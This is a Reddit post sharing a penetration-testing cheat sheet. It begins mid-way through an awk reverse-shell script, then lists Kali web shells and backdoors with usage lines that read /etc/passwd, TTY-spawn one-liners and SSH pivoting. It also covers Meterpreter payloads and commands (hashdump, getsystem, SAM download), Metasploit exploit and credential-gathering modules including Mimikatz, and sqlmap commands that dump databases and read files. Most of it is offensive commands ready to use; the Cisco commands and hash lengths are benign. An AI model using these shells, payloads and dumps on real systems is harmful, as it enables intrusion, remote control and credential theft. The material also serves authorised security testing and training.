            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

Kali Web Shells

The following shells exist within Kali Linux, under /usr/share/webshells/. These are only useful if you are able to upload, inject or transfer the shell to the machine.

Kali PHP Web Shells

/usr/share/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell
/usr/share/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindful of the target server's architecture), execute with netcat not a browser: nc -v target 80
/usr/share/webshells/php/simple-backdoor.php - PHP backdoor, useful for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
/usr/share/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.

Tip: Executing Reverse Shells

The last two shells above are not reverse shells; however, they can be useful for executing a reverse shell.

Kali Perl Reverse Shell

/usr/share/webshells/perl/perl-reverse-shell.pl - Pen Test Monkey - Perl Reverse Shell
/usr/share/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

/usr/share/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usr/share/webshells/asp/ - Kali ASP Shells

Kali ASPX Shells

/usr/share/webshells/aspx/ - Kali ASPX Shells

Kali JSP Reverse Shell

/usr/share/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell

TTY Shells

Tips / tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick - python -c 'import pty;pty.spawn("/bin/bash")' - or, from within an interactive Python session: os.system('/bin/bash')
Spawn Interactive sh shell - /bin/sh -i
Spawn Perl TTY Shell - perl -e 'exec "/bin/sh";' - or, from within a Perl script: exec "/bin/sh";
Spawn Ruby TTY Shell - exec "/bin/sh"
Spawn Lua TTY Shell - os.execute('/bin/sh')
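Before picking an upgrade method, it helps to know which interpreters the target actually has. A quick probe (the interpreter list is illustrative):

```shell
# Probe for TTY-capable interpreters before choosing a spawn method
# from the list above.
for i in sh bash python python3 perl ruby lua; do
    command -v "$i" >/dev/null 2>&1 && echo "found: $i"
done
```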

Spawn TTY Shell from Vi

Run shell commands from vi: - :!bash
Spawn TTY Shell NMAP - !sh

SSH Port Forwarding

ssh -L 9999:TARGET-IP:445 user@PIVOT-IP - Port 9999 locally is forwarded to port 445 on TARGET-IP through PIVOT-IP

SSH Port Forwarding with Proxychains

ssh -D 9050 user@TARGET-IP - Dynamically allows all port forwards to the subnets available on the target (point proxychains at local port 9050).

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp - Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp set ViewOnly false - Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp - Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file c:\windows - Meterpreter upload file to Windows target
download c:\windows\repair\sam /tmp - Meterpreter download file from Windows target
execute -f c:\windows\temp\exploit.exe - Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c - Creates new channel with cmd shell
ps - Meterpreter show processes
shell - Meterpreter get shell on the target
getsystem - Meterpreter attempts privilege escalation on the target
hashdump - Meterpreter attempts to dump the hashes on the target
portfwd add -l 3389 -p 3389 -r target - Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target - Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi - MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi - MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index - MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac - Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

use auxiliary/scanner/http/dir_scanner - Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan - Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login - Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version - Metasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_login - Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery - Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell - Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer - Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload - Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gather/win_privs - Metasploit show privileges of current user
use post/windows/gather/credentials/gpp - Metasploit grab GPP saved passwords
load mimikatz -> wdigest - Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum - Identify other machines that the supplied domain user has administrative access to

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable - Enters enable mode
conf t - Short for, configure terminal
(config)# interface fa0/0 - Configure FastEthernet 0/0
(config-if)# ip addr <ip> <netmask> - Add an IP address to fa0/0
(config-if)# line vty 0 4 - Configure vty line
(config-line)# login - Cisco set telnet password
(config-line)# password YOUR-PASSWORD - Set telnet password

show running-config - Show running config loaded in memory

show startup-config - Show startup config

show version - show cisco IOS version

show session - display open sessions

show ip interface - Show network interfaces

show interface e0 - Show detailed interface info

show ip route - Show routes

show access-lists - Show access lists

show file systems - Show available file systems

dir all-filesystems - File information

dir /all - Show deleted files

terminal length 0 - No limit on terminal output

copy running-config tftp - Copies running config to tftp server

copy running-config startup-config - Copy running-config to startup-config


Hash Lengths

MD5 Hash Length - 16 Bytes
SHA-1 Hash Length - 20 Bytes
SHA-256 Hash Length - 32 Bytes
SHA-512 Hash Length - 64 Bytes
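These lengths are raw bytes; hashing tools print hex digests, which use two characters per byte (so an MD5 shows as 32 hex characters). A helper for sizing an unknown digest (hash_bytes is a made-up name for this sketch):

```shell
# Convert a hex digest to its byte length: hex chars / 2.
# MD5 -> 16, SHA-1 -> 20, SHA-256 -> 32, SHA-512 -> 64 bytes.
hash_bytes() {
    # $1: hex digest string
    echo $(( ${#1} / 2 ))
}
```

For example, `hash_bytes 5f4dcc3b5aa765d61d8327deb882cf99` prints 16, identifying the digest as MD5-length.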

SQLMap Examples

sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php" - Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms - sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name
submitted by LubuntuFU to r/Kalilinux